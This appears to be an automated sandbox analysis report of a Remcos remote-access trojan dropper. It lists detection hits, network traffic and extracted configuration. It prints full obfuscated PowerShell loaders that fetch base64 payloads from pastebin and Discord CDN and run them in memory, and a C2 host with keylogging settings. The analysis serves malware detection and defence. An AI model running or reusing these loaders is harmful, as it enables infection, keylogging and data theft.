eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\envifa.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\envifa.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\envifa.vbs", ProcessId: 6608, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0

                Stealing of Sensitive Information

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6736, TargetFilename: C:\ProgramData\remcos\logs.dat
                Timestamp:07/10/24-19:53:11.852594
                SID:2018856
                Source Port:443
                Destination Port:49732
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/10/24-19:53:15.950094
                SID:2020423
                Source Port:443
                Destination Port:49735
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/10/24-19:53:15.950094
                SID:2020424
                Source Port:443
                Destination Port:49735
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: remcoss2024feb.duckdns.orgAvira URL Cloud: Label: phishing
                Source: 00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "remcoss2024feb.duckdns.org:4576:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-LD53L6", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.21a1eaef6e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.21a1eaef6e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3015953762.0000000002E0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4908, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6736, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_00433837
                Source: powershell.exe, 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_07d975ef-3

                Exploits

                barindex
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.21a1eaef6e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.21a1eaef6e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4908, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6736, type: MEMORYSTR

                Privilege Escalation

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004074FD _wcslen,CoGetObject,4_2_004074FD
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040C34D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040783C FindFirstFileW,FindNextFileW,4_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407C97

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebp-58h], 00000000h3_2_00007FFD9B878891
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD9B8784C6h3_2_00007FFD9B8782E5
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD9B87BB23h3_2_00007FFD9B87BAB5
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD9B87690Dh3_2_00007FFD9B87689A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD9B880E86h3_2_00007FFD9B880E19
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD9B876DD4h3_2_00007FFD9B876D50

                Networking

                barindex
                Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 142.250.185.138:443 -> 192.168.2.4:49732
                Source: TrafficSnort IDS: 2020423 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 162.159.129.233:443 -> 192.168.2.4:49735
                Source: TrafficSnort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 162.159.129.233:443 -> 192.168.2.4:49735
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4908, type: MEMORYSTR
                Source: Malware configuration extractorURLs: remcoss2024feb.duckdns.org
                Source: unknownDNS query: name: pastebin.com
                Source: unknownDNS query: name: remcoss2024feb.duckdns.org
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4908, type: MEMORYSTR
                Source: global trafficTCP traffic: 192.168.2.4:49736 -> 191.98.25.251:4576
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/sFgsbG3v HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /attachments/1215337232609714261/1260301846166245438/envi9.7.txt?ex=668ed30f&is=668d818f&hm=a1bad6d076519c9b6da1f5993a85c58a2178d013d09a631c6546fb3f4e81d086& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
                Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_0041B380
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/sFgsbG3v HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /attachments/1215337232609714261/1260301846166245438/envi9.7.txt?ex=668ed30f&is=668d818f&hm=a1bad6d076519c9b6da1f5993a85c58a2178d013d09a631c6546fb3f4e81d086& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: pastebin.com
                Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
                Source: global trafficDNS traffic detected: DNS query: remcoss2024feb.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0ECE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0F066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/1215337232609714261/1260301846166245438/ENVI9.7.TXT?EX=668ED3
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0F066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0F031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0FF52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firebasestorage.googleapis.com
                Source: RegSvcs.exe, RegSvcs.exe, 00000004.00000002.3014847261.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3014847261.0000000001206000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: RegSvcs.exe, 00000004.00000002.3014847261.00000000011E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp=
                Source: RegSvcs.exe, 00000004.00000002.3014847261.00000000011E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpA
                Source: RegSvcs.exe, 00000004.00000002.3014847261.0000000001206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpDt8
                Source: powershell.exe, 00000003.00000002.1839358905.0000021A1E910000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A101C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0FF04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0EFEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0FEEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0FC1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                Source: powershell.exe, 00000003.00000002.1823651689.0000021A0CAC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/V9y5Q5vv
                Source: powershell.exe, 00000003.00000002.1847918103.0000021A26A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/v9y5q5vv
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A1013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.1856499835.000001A1A4904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0E8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0FFED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A1013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000001.00000002.1856499835.000001A1A48BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1856499835.000001A1A48D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0E8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0F066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discorP
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0ECE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0F066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
